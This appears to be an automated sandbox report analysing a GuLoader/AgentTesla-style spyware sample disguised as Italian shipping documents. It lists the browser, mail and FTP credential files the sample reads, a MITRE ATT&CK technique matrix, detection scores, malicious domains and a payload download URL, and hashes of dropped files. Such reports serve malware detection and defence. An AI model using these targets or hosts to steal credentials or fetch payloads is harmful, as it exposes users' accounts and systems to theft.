            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596499Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596171Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595948Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595828Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595718Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595609Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595499Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595390Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595279Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595171Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 594843Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 594624Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3249854436.00000000056BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@Oo
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3249854436.00000000056EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4889
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4896
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess created: C:\Users\user\Desktop\Documenti di spedizione.bat.exe "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeQueries volume information: C:\Users\user\Desktop\Documenti di spedizione.bat.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_00405F19 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405F19
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.3268012189.0000000035D3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3268012189.0000000035D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Documenti di spedizione.bat.exe PID: 6360, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000004.00000002.3268012189.0000000035D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Documenti di spedizione.bat.exe PID: 6360, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.3268012189.0000000035D3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3268012189.0000000035D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Documenti di spedizione.bat.exe PID: 6360, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            4
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            1
            Credentials in Registry
            226
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection
            2
            Obfuscated Files or Information
            Security Account Manager311
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading
            NTDS141
            Virtualization/Sandbox Evasion
            Distributed Component Object Model1
            Clipboard Data
            13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            System Network Configuration Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Documenti di spedizione.bat.exe15%VirustotalBrowse
            Documenti di spedizione.bat.exe13%ReversingLabs
            Documenti di spedizione.bat.exe100%AviraHEUR/AGEN.1338492
            Documenti di spedizione.bat.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            SourceDetectionScannerLabelLink
            api.ipify.org0%VirustotalBrowse
            concaribe.com3%VirustotalBrowse
            ftp.concaribe.com6%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://api.ipify.org/0%URL Reputationsafe
            https://api.ipify.org0%URL Reputationsafe
            http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            https://api.ipify.org/t0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            api.ipify.org
            104.26.13.205
            truefalseunknown
            concaribe.com
            192.185.13.234
            truetrueunknown
            ftp.concaribe.com
            unknown
            unknowntrueunknown
            171.39.242.20.in-addr.arpa
            unknown
            unknownfalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              https://api.ipify.org/false
              • URL Reputation: safe
              unknown
              http://84.38.129.16/rNWbaMk175.binfalse
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://api.ipify.orgDocumenti di spedizione.bat.exe, 00000004.00000002.3268012189.0000000035CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://ftp.concaribe.comDocumenti di spedizione.bat.exe, 00000004.00000002.3268012189.0000000035D3C000.00000004.00000800.00020000.00000000.sdmptrue
                  unknown
                  http://nsis.sf.net/NSIS_ErrorDocumenti di spedizione.bat.exefalse
                  • URL Reputation: safe
                  unknown
                  http://nsis.sf.net/NSIS_ErrorErrorDocumenti di spedizione.bat.exefalse
                  • URL Reputation: safe
                  unknown
                  http://concaribe.comDocumenti di spedizione.bat.exe, 00000004.00000002.3268012189.0000000035D3C000.00000004.00000800.00020000.00000000.sdmpfalse
                    unknown
                    https://api.ipify.org/tDocumenti di spedizione.bat.exe, 00000004.00000002.3268012189.0000000035CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDocumenti di spedizione.bat.exe, 00000004.00000002.3268012189.0000000035CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://84.38.129.16/rNWbaMk175.biniDocumenti di spedizione.bat.exe, 00000004.00000002.3249854436.00000000056D3000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      104.26.13.205
                      api.ipify.orgUnited States
                      13335CLOUDFLARENETUSfalse
                      192.185.13.234
                      concaribe.comUnited States
                      46606UNIFIEDLAYER-AS-1UStrue
                      84.38.129.16
                      unknownLatvia
                      203557DATACLUB-NLfalse
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1538406
                      Start date and time:2024-10-21 08:23:06 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 42s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:5
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Documenti di spedizione.bat.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@3/18@3/3
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 96%
                      • Number of executed functions: 182
                      • Number of non-executed functions: 72
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      TimeTypeDescription
                      02:25:14API Interceptor392x Sleep call for process: Documenti di spedizione.bat.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      104.26.13.205file.exeGet hashmaliciousUnknownBrowse
                      • api.ipify.org/
                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                      • api.ipify.org/
                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                      • api.ipify.org/
                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                      • api.ipify.org/
                      Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                      • api.ipify.org/
                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                      • api.ipify.org/
                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                      • api.ipify.org/
                      file.exeGet hashmaliciousUnknownBrowse
                      • api.ipify.org/
                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                      • api.ipify.org/
                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                      • api.ipify.org/
                      192.185.13.234draft bl_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                      • concaribe.com/wp-includes/assets/GkRyQpLAQhPD144.bin
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      api.ipify.orgd600758023374f78d58acafbcaf94af66ad203b28e22a.exeGet hashmaliciousQuasarBrowse
                      • 172.67.74.152
                      RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                      • 104.26.12.205
                      mbbkel3.cmdGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      570ZenR882.exeGet hashmaliciousUnknownBrowse
                      • 104.26.12.205
                      sgc0e7HpH5.exeGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      uHaQ34KPq5.exeGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      wOP5sowoN1.exeGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      570ZenR882.exeGet hashmaliciousUnknownBrowse
                      • 104.26.12.205
                      oD0N44Ka53.exeGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      sgc0e7HpH5.exeGet hashmaliciousUnknownBrowse
                      • 104.26.12.205
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                      • 104.21.53.8
                      #U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                      • 188.114.97.3
                      RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • 188.114.96.3
                      file.exeGet hashmaliciousLummaCBrowse
                      • 104.21.53.8
                      https://cambridge.pl/testy-poziomujaceGet hashmaliciousUnknownBrowse
                      • 104.22.58.91
                      http://sustainability-bunnings.comGet hashmaliciousUnknownBrowse
                      • 104.18.43.2
                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                      • 172.67.206.204
                      https://app.creatopy.com/share/d/qvnqyxdo8o7mGet hashmaliciousUnknownBrowse
                      • 104.17.223.152
                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                      • 172.67.206.204
                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                      • 172.67.206.204
                      UNIFIEDLAYER-AS-1USla.bot.mips.elfGet hashmaliciousUnknownBrowse
                      • 162.240.133.181
                      arm4.elfGet hashmaliciousUnknownBrowse
                      • 74.91.244.57
                      la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                      • 98.131.252.189
                      https://izachw.net/log.htmlGet hashmaliciousHTMLPhisherBrowse
                      • 162.241.87.207
                      https://www.marketbeat.com/instant-alerts/nasdaq-meta-initiated-coverage-2024-10-11/Get hashmaliciousUnknownBrowse
                      • 162.241.152.127
                      https://hermiklosfmer.invoicinglawyer.com/95jEN/Get hashmaliciousUnknownBrowse
                      • 69.49.230.198
                      https://www.google.com.sg/url?q=p8v7jruqDC0s&rct=p8v7jruqDC0s&sa=t&esrc=p8v7jruqDC0s&source=&cd=p8v7jruqDC0s&uact=&url=amp%2Famandotuvoz.org/service/jkbhwfdhjkng/frederic.delesalle@treezor.comGet hashmaliciousHTMLPhisherBrowse
                      • 192.185.85.251
                      Revised Agreement-59176786.pdfGet hashmaliciousCaptcha PhishBrowse
                      • 173.254.24.56
                      https://www.cognitoforms.com/f/Bj0I4KTKbkCO-wVp9VSRWQ/1Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                      • 67.20.76.226
                      https://njanimallaw.com/divorce-family-law/Get hashmaliciousUnknownBrowse
                      • 162.241.217.237
                      DATACLUB-NLPO-94858.exeGet hashmaliciousSnake KeyloggerBrowse
                      • 185.29.11.116
                      PO-94858.exeGet hashmaliciousSnake KeyloggerBrowse
                      • 185.29.11.116
                      Order 10172024.bat.exeGet hashmaliciousAgentTeslaBrowse
                      • 185.29.11.116
                      Order 10172024.bat.exeGet hashmaliciousAgentTeslaBrowse
                      • 185.29.11.116
                      na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                      • 185.29.11.111
                      Upit 220062.xlsGet hashmaliciousRemcosBrowse
                      • 185.29.11.111
                      1njpP9QcUg.rtfGet hashmaliciousUnknownBrowse
                      • 185.29.11.107
                      yYk4nXhHaA.docGet hashmaliciousUnknownBrowse
                      • 185.29.11.107
                      na.rtfGet hashmaliciousRemcosBrowse
                      • 185.29.11.107
                      Shipping documents 000309498585956000797900.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                      • 84.38.133.140
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      3b5074b1b5d032e5620f69f9f700ff0eRFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • 104.26.13.205
                      rRFQ24201007_pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • 104.26.13.205
                      http://heks.egrowbrands.com/lopsa/67057a2256a25_SwiftKey.exeGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      http://lide.omernisar.com/lopsa/66daf6d8ac980_PeakSports.exeGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      SecuriteInfo.com.Win64.MalwareX-gen.7613.15918.exeGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      SecuriteInfo.com.Win64.MalwareX-gen.7443.30781.exeGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      SecuriteInfo.com.Win64.MalwareX-gen.7613.15918.exeGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      SecuriteInfo.com.Win64.MalwareX-gen.7443.30781.exeGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      SecuriteInfo.com.Win64.DropperX-gen.18606.18356.exeGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      SecuriteInfo.com.Win64.DropperX-gen.5372.31408.exeGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dllDHL AWB - COMMERCIAL INVOICE AND BL.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                        Shipping Documents.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                          Oogoninia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            Oogoninia.exeGet hashmaliciousGuLoaderBrowse
                              rStopfodringer.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                rStopfodringer.exeGet hashmaliciousGuLoaderBrowse
                                  Transferencia 10-7-2024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    Transferencia 10-7-2024.exeGet hashmaliciousGuLoaderBrowse
                                      PEDIDO-144848.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        PEDIDO-144848.exeGet hashmaliciousGuLoaderBrowse
                                          Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):42
                                          Entropy (8bit):3.9726590202682766
                                          Encrypted:false
                                          SSDEEP:3:guTWyXRAK4vn:TzRAKi
                                          MD5:276D6E1D94791E4BC828A3B5F04A73EA
                                          SHA1:4665FD1D7598D3D751B5232BBB0859123D79A3BE
                                          SHA-256:812A9FCAACC7A28EBA4FA5EDB16AE49DD9BBFECFC112E5957C984BC4A50F7304
                                          SHA-512:F8A6F577DE29F60997EAB5F032C6CAF6C2565C8E018EDDD88900DFF17062CCA7D2B6BA30844F8A7A0DB4759056481F6C1D290C99378E8C540031B3C3E008E8DE
                                          Malicious:false
                                          Reputation:low
                                          Preview:[Tnkerne]..Stikkelen=Skjorteknappernes66..
                                          Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):100910
                                          Entropy (8bit):4.6136825228526845
                                          Encrypted:false
                                          SSDEEP:1536:hUL2eODkXBisy4uA2vOqMkkETeiknT0fouNyGZkI67AxzVUT0f3Wz06Vf+:OyeKMB9y4h2SM0nuNnxP6Tg3W1+
                                          MD5:0CDD72DC4C52FC3E3679087A86475EC7
                                          SHA1:086083A90B709250B42C54ED9080ECECD5702610
                                          SHA-256:97DAB1CE75FCD484894E8B9C653ECB4609412ADBFD56CF4D352E4F8ED672963A
                                          SHA-512:F7A36729504B8D94C188AC80214993F7D780C7431DAA2163CA6BD304BFA57DCE5160B8AAF7DA422E4A53067349D8412EC70685A9BDE9C321E9ABE93C3AB701ED
                                          Malicious:false
                                          Reputation:low
                                          Preview:....W.88........................n..........o........#.U.........ooo..........?..(......W.....I.....................((((.c...oo........VVVV..!!.......p.............S......A..E...........}}}..............8..|.........*................./.TTT...11.....|.......R........y......YY...MM..........Q.?.nn....::.4.....KKKK................x.....,.............................b..XX...KK........;...................444.......f...44....BBB......T.pp.......................qq.....00...JJ........e......#.....!!!!!..s...F........---.3....,....//...................YYYY..................0....s...........1..aa......ii.....W....................yy.tt.VV..ee......zz.....................W..........[............................O.hh...............ee..................................7.......NN.`....G....b...Q.......Z....**.ggggggg..qqqqq.....c..............i..L.........R....q...............*....Q..,,,,........{{{.............................||||...X...~~~~...........w...!..:...............hh.M.,,,,......:........(.jj
                                          Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):438667
                                          Entropy (8bit):1.2554285943940462
                                          Encrypted:false
                                          SSDEEP:1536:WQqatwb3BquFonZ0MZGDfw/Ams7/cTCDEhqR9:prwTBq1ZPGD4/xsDEh8
                                          MD5:1EF716DEB3AD336E09ABC68798EEFB78
                                          SHA1:15E56DD29E83D44626E46F219AA1EFC8FEC6FB73
                                          SHA-256:6401066B34D5FD3C9103C01112200E109A78A3DC584B7E55392B7A45020A76B0
                                          SHA-512:6BD0842FE87E9C7467249673485392D1A718B84A757BE8AB94F4323F5BE358C0975A7E5BC4F74AF2EF69F5DB46AD00DCE3DDA9BBD20C2A6CE9D364883A40E7F9
                                          Malicious:false
                                          Reputation:low
                                          Preview:...........................a.............o.................L........................................s..)..........................................E................./.................@....................................................?........................d.................................................................~..............................................T...................=..............................9....../......................0....H..............x.....................................7..........................................................N............7..................................................R...............R...................z.................................................`......................G...............................................................................`.....................~.........................-.........................................................................................................n.....................
                                          Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):419878
                                          Entropy (8bit):1.2587845148762749
                                          Encrypted:false
                                          SSDEEP:1536:iKHVhskoaFMrwPuNqw8hbEZ1EvgaKCiIklf3:JHcP9+w8hb8IQ
                                          MD5:93C85B7E4C86F442491FF2D5F5B3FE0B
                                          SHA1:893EE5DC579DA377DCE95F9DECAF57438F967112
                                          SHA-256:7D60978D18793A119BB47B0D702E2D1EFAE28514EB46E9F96D75BB6FDA4ECF99
                                          SHA-512:A0D6B52554F688E47986FFA6B3885393F47A5D51895DC40219BDB1C838609755B1A801E446B926B44AB6C2F4B8A05A183D3C6BBF0D16CA84802CB5DBCA1581C9
                                          Malicious:false
                                          Reputation:low
                                          Preview:.............................................................R2..I...............y.......................................!.............................B....................... .................................@.......................d.....d..................................`........,......................m.....L......j......3....H....;.........................................~......s......................................................K...........................................Q.........G.................................................a..............$...............................Y.......s................p...................................................................................................................................................................D...............................................&.......................B..............................2........i...........................................................`...............................................
                                          Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):513
                                          Entropy (8bit):4.312755423928167
                                          Encrypted:false
                                          SSDEEP:12:iN2DyKkMNtYdKYK90GbzE1gcaAy6AGb0CY3EoAAV:iYDZBGILeGzAy6jbts
                                          MD5:3A44600B8B24F5CC7EF13B014C5FC8E6
                                          SHA1:DABC64C2788C61476C159BF60E27A0385B761223
                                          SHA-256:037EE7216549B3D566F3D53E5801D45ADACF332F937FB43BD5A5E3F0DF9662A6
                                          SHA-512:02985E9F575B10700A6C8FE167DB6EBD81E1B8DE758DFAB47BB01AB7FE568525C17E933AA2DB98673E1A43EB3EF63CAB6E97D59FE1B1D52E3484737E0D9B4CBE
                                          Malicious:false
                                          Reputation:low
